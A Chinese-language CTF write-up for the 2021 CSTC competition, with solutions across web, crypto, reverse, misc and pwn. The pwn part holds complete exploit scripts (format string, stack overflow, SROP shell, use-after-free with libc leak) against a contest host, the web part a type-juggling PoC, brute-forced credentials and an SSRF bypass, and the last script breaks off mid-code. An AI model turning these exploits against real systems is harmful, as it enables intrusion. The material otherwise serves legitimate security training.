
2021CSTC write up

Web

easyweb

代码审计:弱类型和函数的特性

<?php
// Challenge source as served (show_source prints this file to the player).
// Every gate below relies on PHP loose typing; the three flags $v1/$v2/$v3
// are set only through the query parameters foo, cat and dog.
show_source(__FILE__);
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['foo']);// decode JSON from ?foo and cast to array
if(is_array($a)){
   is_numeric(@$a["bar1"])?die("nope"):NULL;// bar1 must not be a number or numeric string
   if(@$a["bar1"]){
       ($a["bar1"]>2021)?$v1=1:NULL;// loose string-vs-int comparison (PHP weak typing)
   }
   if(is_array(@$a["bar2"])){
       // both needed (OR of the negated conditions): count == 5 and bar2[0] is an array
       if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
       $pos = array_search("nudt", $a["a2"]);
       // a2 is searched for the string "nudt"; only a strict false result fails the check
       $pos===false?die("nope"):NULL;
       foreach($a["bar2"] as $key=>$val){// iterate bar2
              // no element of bar2 may be exactly the string "nudt" (strict ===)
           $val==="nudt"?die("nope"):NULL;
       }
       $v2=1;// second gate passed
   }
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
   if(!strcmp($c[1],$d) && $c[1]!==$d){
        // both must hold: strcmp() reports "equal" while !== says "different";
        // the write-up relies on strcmp(array, string) returning NULL (loose typing)
       eregi("3|1|c",$d.$c[0])?die("nope"):NULL;// eregi() (deprecated, removed in PHP 7) stops at a %00 byte
       strpos(($c[0].$d), "cstc2021")?$v3=1:NULL;
       // position of "cstc2021" in $c[0].$d; it must be truthy, so position 0 does not count
   }
}
if($v1 && $v2 && $v3){
   include "flag.php";
   echo $flag;
}
?>

poc:?foo={"bar1":"2022a","bar2":[[1],2,3,4,5],"a2":"nudt"}&cat[1][]=111&cat[0]=12cstc2021&dog=%00

easyweb2

最开始通过扫描得到了路径swagger-ui.html

然后就经历特别多的测试,最后给了提醒使用token,而token是通过登录来获得的,这里就通过暴力破解了。成功暴力破解出test/test。

在看提示说需要获得管理员的token。然后发现有一个user-controller,那可能是暴力破解出admin用户

成功暴力破解

{"用户ID":"987","用户组":"系统管理员","用户名":"ctf_admin","HASH":"2773d5bd7e1a7a7eec619c6d5fbdfd3a"}

2773d5bd7e1a7a7eec619c6d5fbdfd3a解出为ctfer123!@#

所以ctf_admin/ctfer123!@#,重新登录。

获得管理员Token:9c618e664319512ef7db2d3c0672bee0

然后提示关注/home/index接口,猜一猜肯定是ssrf啦。这里经过fuzz出过滤了file,所以通过双写绕过。

成功获得flag

Crypto

RSA2

由于padding的范围很小,可以通过小公钥指数攻击估算出e;又因为范围很小,e可以视为已知

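# Estimate e from the two low-exponent ciphertexts: each cube root is
# e plus an unknown padding value drawn from [start, end].
e_small = gmpy2.iroot(c1, 3)[0]
e_big = gmpy2.iroot(c2, 3)[0]
if e_small > e_big:
    e_small, e_big = e_big, e_small
start = 20210401
end = 20210505
# e_big carries the larger padding, so the lower bound subtracts `end` and the
# upper bound subtracts `start`.  (The other way round gives e_min > e_max and
# an empty search range.)
e_min = e_big - end
e_max = e_small - start
# observed for this instance: e_min = 53860, e_max = 53957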

因为g = d * (p - 0xdeadbeef),且e已知,同乘e即可在mod n的条件下消去d

又因0xdeadbeef为常数,可以通过构造消去,从而得到K*p的结构;对其与n求最大公因数即可分解n,并同时确定e

# The factor 2^(0xdeadbeef - 1) mod n does not depend on e; compute it once.
shift = pow(2, 0xdeadbeef - 1, n)
# Scan the candidate e values; the first one that exposes a non-trivial
# common factor with n is the real e, and `p` is that factor.
for e in range(e_min, e_max):
    kp = pow(2, e * g, n) * shift
    p = gmpy2.gcd(kp - 1, n)
    if p != 1:
        break

已知e,n,p则可以分解出q,从而求出d,之后则可以通过常规的rsa解密

EXP

from gmpy2 import *
from Crypto.Util.number import *

# Two small (e = 3) ciphertexts whose cube roots bound the real exponent e.
c1 = 8321449807360182827125
c2 = 8321441183828895770712
# RSA modulus.
n = 378094963578091245652286477316863605753157432437621367359342302751615833557269627727449548734187939542588641672789504086476494927855747407344197241746889123693358997028141479289459947165818881146467218957546778123656120190207960702225556466771501844979094137868818924556860636212754616730115341674681116573326890134855072314950288530400350483394140781434097516134282100603979066057391672872913866678519235744668652042193736205044674422210689619562242862928626697711582401250962536787125165979017740138070213899305175933585261127763164192929103624167063213758551239415744211455417108907505646457646161227272639379721764779734013149963229002406400371319674194009206372087547010201440035410745572669645666856126204769178179570446069571090298945041726576151255620825221663591127702492882834949100599423704250729752444923956601971323645242934249137015933524911614158989705977723056398299344849153945858516695027157652464450872079484515561281333287781393423326046633891002695625031041881639987758851943448352789469117137668229144914356042850963002345804817204906458653402636643504354041188784842235312540435896510716835069861282548640947135457702591305281493685478066735573429735004662804458309301038827671971059369532684924420835204769329
# Leaked value g = d * (p - 0xdeadbeef), as described in the text above.
g = 3976547671387654068675440379770742582328834393823569801056509684207489138919660098684138301408123275651176128285451251938825197867737108706539707501679646427880324173378500002196229085818500327236191128852790859809972892359594650456622821702698053681562517351687421071768373342718445683696079821352735985061279190431410150014034774435138495065087054406766658209697164984912425266716387767166412306023197815823087447774319129788618337421037953552890681638088740575829299105645000980901907848598340665332867294326355124359170946663422578346790893243897779634601920449118724146276125684875494241084873834549503559924080309955659918449396969802766847582242135030406950869122744680405429119205293151092844435803672994194588162737131647334232277272771695918147050954119645545176326227537103852173796780765477933255356289576972974996730437181113962492499106193235475897508453603552823280093173699555893404241432851568898226906720101475266786896663598359735416188575524152248588559911540400610167514239540278528808115749562521853241361159303154308894067690191594265980946451318139963637364985269694659506244498804178767180096195422200695406893459502635969551760301437934119795228790311950304181431019690890246807406970364909654718663130558117158600409638504924084063884521237159579000899800018999156006858972064226744522780397292283123020800063335841101274936236800443981678756303192088585798740821587192495178437647789497048969720110685325336457005611803025549386897596768084757320114036370728368369612925685987251541629902437275412553261624335378768669846356507330025425467339014984330079364067149950238561943275006049728406278318846998650496707162387768801213108565185221147664770009978012050906904959264045050100404522270495606970447076283894255951481388496134870426452215997834228869196114684962261076716651779120620585343304887755029463545328534291186
# Flag ciphertext, decrypted at the end of the script.
c = 141187369139586875794438918220657717715220514870544959295835385681523005285553297337947377472083695018833866941104904071675141602626896418932763833978914936423338696805941972488176008847789235165341165167654579559935632669335588215515509707868555632337151209369075754122977694992335834572329418404770856890386340258794368538033844221701815983303376617825048502634692029763947325144731383655217790212434365368739783525966468588173561230342889184462164098771136271291295174064537653917046323835004970992374805340892669139388917208009182786199774133598205168195885718505403022275261429544555286425243213919087106932459624050446925210285141483089853704834315135915923470941314933036149878195756750758161431829674946050069638069700613936541544516511266279533010629117951235494721973976401310026127084399382106355953644368692719167176012496105821942524500275322021731162064919865280000886892952885748100715392787168640391976020424335319116533245350149925458377753639177017915963618589194611242664515022778592976869804635758366938391575005644074599825755031037848000173683679420705548152688851776996799956341789624084512659036333082710714002440815131471901414887867092993548663607084902155933268195361345930120701566170679316074426182579947
# Padding range (date-shaped values) from which the bound on e is derived.
start = 20210401
end = 20210505

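# Cube roots of the two small-exponent ciphertexts: each is e plus an
# unknown padding from [start, end].
e_small = iroot(c1, 3)[0]
e_big = iroot(c2, 3)[0]

# Order the estimates so that e_small <= e_big.
if e_small > e_big:
    e_small, e_big = e_big, e_small
if not e_small < e_big:
    # The original used `assert`, which is stripped under -O; fail loudly instead.
    raise ValueError("cube-root estimates are not distinct; cannot bound e")

# e_big carries the larger padding, so the lower bound subtracts `end` and
# the upper bound subtracts `start`.  Both ends are inclusive candidates.
e_min = e_big - end
e_max = e_small - start
# observed for this instance: e_min = 53860, e_max = 53957

# The factor 2^(0xdeadbeef - 1) mod n does not depend on e; compute it once.
shift = pow(2, 0xdeadbeef - 1, n)
for e in range(e_min, e_max + 1):
    kp = pow(2, e * g, n) * shift
    p = gcd(kp - 1, n)
    # Accept only a proper factor: gcd == n would leave q == 1 and phi == 0.
    if 1 < p < n:
        break
else:
    raise ValueError("no factor of n found in the e range; check the padding bounds")

q = n // p
phi = (q - 1) * (p - 1)
print(long_to_bytes(pow(c, invert(e, phi), n)))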

Re

free_flag

首先反编译,可以知道关心的应该是Pin的值

找到对Pin进行了引用的地方,异或

image-20210505215117770

找到byte_B98数组的值,异或一下12

#include <stdio.h>

/*
 * Bytes copied from the binary's byte_B98 array (IDA export).
 * main() XORs each one with 0xc and prints the result.
 */
unsigned char ida_chars[] =
{
  120, 100,  63,  83, 109, 121, 120, 100,  98,  63, 
  120,  61, 111,  56,  61, 120,  60,  98,  83,  57, 
  117,  57, 120,  63,  97,  83,  61,  57,  83,  98, 
   60, 120,  83,  60,  57,  83,  57,  63, 111, 121, 
  126,  63, 10
};

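/*
 * Decode ida_chars by XORing every byte with 0xc and write the result
 * to stdout.  Returns 0.
 */
int main(void)
{
    size_t i;

    /* size_t matches the type of sizeof(), avoiding a signed/unsigned
     * comparison on every iteration. */
    for (i = 0; i < sizeof(ida_chars); i++)
        putchar(ida_chars[i] ^ 0xc);
    return 0;
}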

crackme

逆向菜鸡做这个绕了个大圈。。。

胡乱找了很久,找到关键代码,然后慢慢看了很久的算法。。

开始是一个长度判断

然后算法,看了很久,感觉复杂啊

image-20210505220830102

上面折磨了很久,然后就去看了看第二部分计算,艹,马上就没做计算,直接比较,那我之前看的第一部算法,不用管啊。。。。

image-20210505221308965

最后,我单步调试一个一个得到计算完的值,再md5,完事

ck

感觉,这个题碰运气,哈哈哈

ida反编译后直接搜索字符串

image-20210505222141639

第一个字符串就很可疑,

然后直接x,找字符串引用,发现新天地

image-20210505222250175

这不是base64编码嘛,从 = 也可以猜想

所以这就是一个换表base64嘛

简单:

import base64

# Custom alphabet recovered from the binary.  It has 64 entries, but 'd'
# occurs twice, so when the mapping is built the later occurrence wins
# (same rule as str.maketrans) and table[19] ('T') is never produced.
s = ",.0fgWV#`/1Heox$~\"2dity%_;j3csz^+@{4bKrA&=}5laqB*-[69mpC()]78ndu"
print(len(s))
# Standard base64 alphabet, position for position.
table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
enc = 'ef"^sVK@3r@Ke4e6%6`)'
# Translate each custom symbol to its standard counterpart; symbols not in
# the custom alphabet pass through unchanged.
_to_standard = dict(zip(s, table))
ans = "".join(_to_standard.get(ch, ch) for ch in enc)

print(base64.b64decode(ans))

得到:04_tianhe233_29。

md5,得到flag

maze

迷宫题

没有什么坑,还给了游戏熟悉的aswd,贴心

让程序跑起来,然后提取出数据,C语言中打印成7*7规模,最后手走一下即可,当然要写搜索算法来跑感觉也行,锻炼一下 hahhah,赛后尝试一下

#include <stdio.h>

/*
 * 7x7 maze cells extracted from the running binary, stored row-major
 * (index = 7*row + col); main() prints them as a grid.  Which of 0/1 is
 * wall and which is path is not established here -- read it off the grid.
 */
unsigned int data[49] = {
    0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 
    0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 
    0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 
    0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 
    0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 
    0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 
    0x00000001
};

/*
 * Print the 49 cells of `data` as a 7x7 grid: one "%d " per cell and a
 * newline after every seventh cell.
 */
int main(void)
{
    size_t k;

    for (k = 0; k < 49; k++) {
        printf("%d ", data[k]);
        if ((k + 1) % 7 == 0)
            putchar('\n');
    }
}

终点就是最后一个点!

image-20210505223314899

ssddwdwdddssaasasaaassddddwdds

再md5一下得到flag。

Misc

RGB

找到了类似的题https://www.cnblogs.com/webFuckeeeer/p/4536776.html

顺着来就可以做出来

通过图片size分解了一下:176和164比较合适

#-*- coding:utf-8 -*-
from PIL import Image
import re

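x = 503  # image width: factor the line count of the txt so that x * y == number of lines
y = 122  # image height
# NOTE(review): the text above says 176 x 164 fit this challenge's file; 503 x 122
# look copied from the referenced post -- confirm against misc100.txt before running.

im = Image.new("RGB", (x, y))  # blank canvas, filled one pixel at a time

# Read one "r,g,b" line per pixel, column by column (i = x, j = y), exactly as
# the original loop did.  The with-block closes the file even if a malformed
# line raises ValueError.
with open('misc100.txt') as fh:
    for i in range(x):
        for j in range(y):
            line = fh.readline()
            channels = tuple(int(v) for v in line.split(",")[:3])
            im.putpixel((i, j), channels)
im.show()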

zip

有个加密的压缩包,没有任何提示.一点点爆破出来的密码是ff123

出来一个加密的docx文件,无法爆破.

还有一个readme.txt文档,里面好像是培根密码

解密docx,直接strings命令发现flag

memory1

搜了一下vmem,一般用volatility进行取证

由于我kali是2020版,就只能在powershell里操作了

先确定imageinfo

再用pstree找相关的进程

找到一个后门metsvc.exe,看是谁调用的:

cmdline参数:

metsvc.exe pid:   1908
************************************************************************
metsvc.exe pid:    400
Command line : "C:\Windows\TEMP\cybSAbYRflAvhz\metsvc.exe" service
************************************************************************
metsvc-server. pid:   1912
************************************************************************
cscript.exe pid:   1472
Command line : cscript "C:\Windows\TEMP\UEAOGWBdwyydm.vbs"

image-20210505222631877

这个vbs就很像了,试了一下确实正确

Pwn

bank

密码为随机值,若密码第一个字节为'\x00',而我们输入也为'\x00',则两者相等;所以输入'\x00',成功几率为1/256,再通过格式化字符串漏洞将堆中的flag打印出来即可。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Thin wrappers over the global pwntools tube `io` (bound in __main__).
def r(x):
    """Receive up to x bytes."""
    return io.recv(x)

def ra():
    """Receive everything until EOF."""
    return io.recvall()

def rl():
    """Receive one line, newline included."""
    return io.recvline(keepends = True)

def ru(x):
    """Receive up to and including x; the delimiter is dropped."""
    return io.recvuntil(x, drop = True)

def s(x):
    """Send x as-is."""
    return io.send(x)

def sl(x):
    """Send x followed by a newline."""
    return io.sendline(x)

def sa(x, y):
    """Wait for x, then send y."""
    return io.sendafter(x, y)

def sla(x, y):
    """Wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)

def ia():
    """Hand the tube over to the user."""
    return io.interactive()

def c():
    """Close the tube."""
    return io.close()

def li(x):
    """Log x highlighted (ANSI colour 214) through pwntools' logger."""
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'  # pwntools: log every byte sent and received
context.terminal = ['tmux', 'splitw', '-h']  # terminal used by gdb.attach() in db()
#context.arch = 'amd64'

elf_path  = 'bank'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'  # overrides the path above; only this value is ever used

# remote server ip and port
host = "81.70.195.166:10000"

# if local debug
LOCAL = 0  # 1: run elf_path locally (and allow gdb.attach in db()); 0: connect to host
LIBC  = 0  # 1: also load libc_path as `libc`
#--------------------------func-----------------------------
def db():
    """Attach gdb to the live tube; a no-op unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    """One attempt against the `bank` prompt sequence.

    The guess only succeeds when the random password starts with a NUL
    byte, so __main__ reconnects and retries this whole sequence.
    """
    li('exploit...')
    p = 'A'
    sla(':', p)      # answer the first ':' prompt
    sl('\x00')       # single NUL byte as the password guess
    ru('?')
    sl('yes')
    #db()
    sl('%8$s')       # format-string payload described in the write-up above

def finish():
    """Hand the session to the user, then close the tube."""
    io.interactive()
    io.close()
#--------------------------main-----------------------------
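if __name__ == '__main__':
    # The guess works for roughly 1 session in 256, so open a fresh
    # connection per attempt.  The original bare `except:` also swallowed
    # KeyboardInterrupt, which made the loop impossible to stop with Ctrl-C;
    # narrowing it to Exception keeps the best-effort retry but stays
    # interruptible, and the failure is logged instead of silently dropped.
    for i in range(255):
        try:
            elf = ELF(elf_path)
            if LOCAL:
                if LIBC:
                    libc = ELF(libc_path)
                io = elf.process()
            else:
                io = remote(host.split(':')[0], int(host.split(':')[1]))
                if LIBC:
                    libc = ELF(libc_path)
            exploit()
            finish()
        except Exception:
            li('attempt %d failed, retrying' % i)
            continue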

auto

先采用angr来 fuzz找到进入login_again函数的输入

angr脚本如下:

import angr
from binascii import b2a_hex
import logging
import sys
# Keep angr's own logger at INFO; the commented line below would silence it.
angr_logger = logging.getLogger('angr')
angr_logger.setLevel(logging.INFO)
#logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    """Explore ./auto from its entry state until address 0x0804867E is
    reached and print the stdin that gets there, hex-encoded, without a
    trailing newline."""
    project = angr.Project('./auto')
    manager = project.factory.simgr(project.factory.entry_state())
    manager.explore(find = 0x0804867E) # call login_again
    stdin_bytes = manager.found[0].posix.dumps(0)
    sys.stdout.write(b2a_hex(stdin_bytes).decode())
angr_main()  # runs on import as well: there is no __main__ guard

login_again就是个堆栈溢出了,留有后门,直接跳到后门函数。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Thin wrappers over the global pwntools tube `io` (bound in __main__).
def r(x):
    """Receive up to x bytes."""
    return io.recv(x)

def ra():
    """Receive everything until EOF."""
    return io.recvall()

def rl():
    """Receive one line, newline included."""
    return io.recvline(keepends = True)

def ru(x):
    """Receive up to and including x; the delimiter is dropped."""
    return io.recvuntil(x, drop = True)

def s(x):
    """Send x as-is."""
    return io.send(x)

def sl(x):
    """Send x followed by a newline."""
    return io.sendline(x)

def sa(x, y):
    """Wait for x, then send y."""
    return io.sendafter(x, y)

def sla(x, y):
    """Wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)

def ia():
    """Hand the tube over to the user."""
    return io.interactive()

def c():
    """Close the tube."""
    return io.close()

def li(x):
    """Log x highlighted (ANSI colour 214) through pwntools' logger."""
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'  # pwntools: log every byte sent and received
context.terminal = ['tmux', 'splitw', '-h']  # terminal used by gdb.attach() in db()
#context.arch = 'amd64'

elf_path  = 'auto'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'  # overrides the path above; only this value is ever used

# remote server ip and port
host = "81.70.195.166:10001"

# if local debug
LOCAL = 0  # 1: run elf_path locally (and allow gdb.attach in db()); 0: connect to host
LIBC  = 0  # 1: also load libc_path as `libc`
#--------------------------func-----------------------------
def db():
    """Attach gdb to the live tube; a no-op unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    """Single interaction with the `auto` binary.

    First sends the 8-byte input the angr script above found for reaching
    login_again, then the overflow payload described in the write-up.
    Byte values and the 0x48 offset are specific to this binary.
    """
    li('exploit...')
    # 55 58 59 55 4b 56 4e 5a
    p = '\x55\x58\x59\x55\x4b\x56\x4e\x5a'
    s(p)
    #db()
    p = b'\x00' * 0x48        # filler up to the saved return address (per the write-up)
    p += p32(0x0)
    p += p32(0x08048665)      # presumably the backdoor function the write-up refers to
    sl(p)

def finish():
    """Hand the session to the user, then close the tube."""
    io.interactive()
    io.close()
#--------------------------main-----------------------------
if __name__ == '__main__':
    # The target ELF is needed in both modes, so load it once up front.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        parts = host.split(':')
        io = remote(parts[0], int(parts[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

small

采用srop进行构造出execve("/bin/sh", 0, 0)拿 shell

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Thin wrappers over the global pwntools tube `io` (bound in __main__).
def r(x):
    """Receive up to x bytes."""
    return io.recv(x)

def ra():
    """Receive everything until EOF."""
    return io.recvall()

def rl():
    """Receive one line, newline included."""
    return io.recvline(keepends = True)

def ru(x):
    """Receive up to and including x; the delimiter is dropped."""
    return io.recvuntil(x, drop = True)

def s(x):
    """Send x as-is."""
    return io.send(x)

def sl(x):
    """Send x followed by a newline."""
    return io.sendline(x)

def sa(x, y):
    """Wait for x, then send y."""
    return io.sendafter(x, y)

def sla(x, y):
    """Wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)

def ia():
    """Hand the tube over to the user."""
    return io.interactive()

def c():
    """Close the tube."""
    return io.close()

def li(x):
    """Log x highlighted (ANSI colour 214) through pwntools' logger."""
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'  # pwntools: log every byte sent and received
context.terminal = ['tmux', 'splitw', '-h']  # terminal used by gdb.attach() in db()
context.arch = 'amd64'  # needed here: SigreturnFrame() in exploit() is built for this arch

elf_path  = 'small'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'  # overrides the path above; only this value is ever used

# remote server ip and port
host = "81.70.195.166:10002"

# if local debug
LOCAL = 0  # 1: run elf_path locally (and allow gdb.attach in db()); 0: connect to host
LIBC  = 0  # 1: also load libc_path as `libc`
#--------------------------func-----------------------------
def db():
    """Attach gdb to the live tube; a no-op unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    """Two-stage SROP interaction with `small` (see the write-up above).

    Stage 1 sends a SigreturnFrame that performs read() into .bss; stage 2
    sends "/bin/sh" plus a second frame that performs execve().  Each
    frame is triggered by a 15-byte send (rax = 15), as noted inline.
    Addresses and offsets are specific to this binary; the sleeps keep the
    sends from being coalesced into one read.
    """
    li('exploit...')
    syscall_ret = 0x40100A   # named by the author; presumably a syscall; ret gadget
    vul_addr  = 0x40100D     # presumably the vulnerable read's entry, re-entered after each frame
    bss = elf.bss() + 0x100  # scratch area used for the second stage

    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_read
    sigframe.rdi = 0
    sigframe.rsi = bss
    sigframe.rdx = 0x200
    sigframe.rsp = bss + 0x18
    sigframe.rip = syscall_ret

    p = b'\x11' * 0x18 + p64(vul_addr) + p64(syscall_ret) + bytes(sigframe)
    s(p)

    # set rax=15 and call sigreturn
    sleep(0.1)
    p = b'\x00' * 15
    s(p)

    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_execve
    sigframe.rdi = bss  # "/bin/sh" 's addr
    sigframe.rsi = 0x0
    sigframe.rdx = 0x0
    sigframe.rsp = bss + 0x18
    sigframe.rip = syscall_ret

    p = b'/bin/sh\x00' + b'\x00' * 0x10 + p64(vul_addr) + p64(syscall_ret) + bytes(sigframe)
    sleep(0.1)
    s(p)

    # call sigreturn
    p = b'\x00' * 15
    #db()
    sleep(0.1)
    s(p)

def finish():
    """Hand the session to the user, then close the tube."""
    io.interactive()
    io.close()
#--------------------------main-----------------------------
if __name__ == '__main__':
    # The target ELF is needed in both modes, so load it once up front.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        parts = host.split(':')
        io = remote(parts[0], int(parts[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

paper

uaf漏洞,开辟堆块到v8 - 8处,修改v9值为0xcccccccc拿shell。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Thin wrappers over the global pwntools tube `io` (bound in __main__).
def r(x):
    """Receive up to x bytes."""
    return io.recv(x)

def ra():
    """Receive everything until EOF."""
    return io.recvall()

def rl():
    """Receive one line, newline included."""
    return io.recvline(keepends = True)

def ru(x):
    """Receive up to and including x; the delimiter is dropped."""
    return io.recvuntil(x, drop = True)

def s(x):
    """Send x as-is."""
    return io.send(x)

def sl(x):
    """Send x followed by a newline."""
    return io.sendline(x)

def sa(x, y):
    """Wait for x, then send y."""
    return io.sendafter(x, y)

def sla(x, y):
    """Wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)

def ia():
    """Hand the tube over to the user."""
    return io.interactive()

def c():
    """Close the tube."""
    return io.close()

def li(x):
    """Log x highlighted (ANSI colour 214) through pwntools' logger."""
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'  # pwntools: log every byte sent and received
context.terminal = ['tmux', 'splitw', '-h']  # terminal used by gdb.attach() in db()
#context.arch = 'amd64'

elf_path  = 'paper'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'  # overrides the path above; only this value is ever used

# remote server ip and port
host = "81.70.195.166:10003"

# if local debug
LOCAL = 0  # 1: run elf_path locally (and allow gdb.attach in db()); 0: connect to host
LIBC  = 0  # 1: also load libc_path as `libc`
#--------------------------func-----------------------------
def db():
    """Attach gdb to the live tube; a no-op unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)
def ad():
    """Send menu choice '1' after the '>' prompt."""
    io.sendlineafter('>', '1')

def rm(idx):
    """Send menu choice '2', then idx at the ':' prompt."""
    io.sendlineafter('>', '2')
    io.sendlineafter(':', str(idx))

def wt(idx, n):
    """Send menu choice '3', then idx and n at the two ':' prompts."""
    io.sendlineafter('>', '3')
    for value in (idx, n):
        io.sendlineafter(':', str(value))

def fd():
    """Send menu choice '4' after the '>' prompt."""
    io.sendlineafter('>', '4')

def mv(idx):
    """Send menu choice '5', then idx at the '?' prompt."""
    io.sendlineafter('>', '5')
    io.sendlineafter('?', str(idx))

def sh():
    """Send menu choice '6' after the '>' prompt."""
    io.sendlineafter('>', '6')

#--------------------------exploit--------------------------
def exploit():
    """Menu interaction for `paper` (UAF, per the write-up); order is significant.

    The 12 hex digits printed after '0x' are read as v8, then v8 - 8 is
    written to slot 0 and 0xCCCCCCCC to slot 2 before choosing option 6.
    """
    li('exploit...')
    ad()
    rm(0)
    fd()
    ru('0x')
    v8 = int(r(12), 16)  # 12 hex digits -> 48-bit value; assumed to be a heap address
    li('v8: ' + hex(v8))
    mv(0x21)
    wt(0, v8 - 8)
    ad() # 1
    ad() # 2
    wt(2, 0xCCCCCCCC)
    sh()
    #db()

def finish():
    """Hand the session to the user, then close the tube."""
    io.interactive()
    io.close()
#--------------------------main-----------------------------
if __name__ == '__main__':
    # The target ELF is needed in both modes, so load it once up front.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        parts = host.split(':')
        io = remote(parts[0], int(parts[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

managebooks

漏洞为uaf,在打印Summary函数中,采用函数指针调用,修改该函数指针,即可劫持rip,先泄漏libc,再调用system即可。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Thin wrappers over the global pwntools tube `io` (bound in __main__).
def r(x):
    """Receive up to x bytes."""
    return io.recv(x)

def ra():
    """Receive everything until EOF."""
    return io.recvall()

def rl():
    """Receive one line, newline included."""
    return io.recvline(keepends = True)

def ru(x):
    """Receive up to and including x; the delimiter is dropped."""
    return io.recvuntil(x, drop = True)

def s(x):
    """Send x as-is."""
    return io.send(x)

def sl(x):
    """Send x followed by a newline."""
    return io.sendline(x)

def sa(x, y):
    """Wait for x, then send y."""
    return io.sendafter(x, y)

def sla(x, y):
    """Wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)

def ia():
    """Hand the tube over to the user."""
    return io.interactive()

def c():
    """Close the tube."""
    return io.close()

def li(x):
    """Log x highlighted (ANSI colour 214) through pwntools' logger."""
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'  # pwntools: log every byte sent and received
context.terminal = ['tmux', 'splitw', '-h']  # terminal used by gdb.attach() in db()
#context.arch = 'amd64'

elf_path  = 'managebooks'
libc_path = '/glibc/2.27/64/lib/libc.so.6'  # local libc; __main__ swaps in ./libc.so.6 for remote

# remote server ip and port
host = "81.70.195.166:10004"

# if local debug
LOCAL = 0  # 1: run elf_path locally (and allow gdb.attach in db()); 0: connect to host
LIBC  = 1  # 1: load libc_path as `libc` (exploit() reads libc.sym)
#--------------------------func-----------------------------
def db():
    """Attach gdb to the live tube; a no-op unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)
def ad(name_sz, name, data_sz, data):
    """Menu choice '1': send name_sz, name, data_sz and data at the ':' prompts.

    Sizes go with a newline; name and data are sent raw (no newline).
    """
    io.sendlineafter('>>', '1')
    io.sendlineafter(':', str(name_sz))
    io.sendafter(':', name)
    io.sendlineafter(':', str(data_sz))
    io.sendafter(':', data)

def rm(idx):
    """Menu choice '2', then idx at the ':' prompt."""
    io.sendlineafter('>>', '2')
    io.sendlineafter(':', str(idx))

def ch(idx, sz, data):
    """Menu choice '3': send idx and sz with newlines, then data raw."""
    io.sendlineafter('>>', '3')
    for value in (idx, sz):
        io.sendlineafter(':', str(value))
    io.sendafter(':', data)
def rd(idx):
    """Menu choice '4', then idx at the ':' prompt."""
    io.sendlineafter('>>', '4')
    io.sendlineafter(':', str(idx))
#--------------------------exploit--------------------------
def exploit():
    """UAF sequence for `managebooks` (see the write-up above).

    Removes index 0 twice, reshapes the freed data with ch(), then uses
    rd() once to leak a libc address (via the puts@plt entry placed by
    ad()) and once more after re-adding with system().  The libc offsets
    are specific to the provided libc.so.6.
    """
    bookcase = 0x6020C0  # only referenced by the commented-out variant below
    li('exploit...')
    ad(0x10, 'AAAA', 0x500, 'bbbb')
    rm(0)
    rm(0)
    ch(0, 0x80, '\x10') # free sum and alloc

    ad(0x10, p64(elf.plt['puts']), 0x30, '/bin/sh\x00') # 1

    '''
    rm(0)
    #ad(0x10, p64(bookcase), 0x20, 'bbbb')
    '''

    rd(0) # leak libc
    # Rebuild the 8-byte pointer from the last 5 bytes before the 0x7f marker.
    leak = u64(ru('\x7f')[-5:] + b'\x7f\x00\x00')
    # 976 + 0x10: empirical distance from the leaked pointer to __malloc_hook
    # for this libc -- not derivable from the code here.
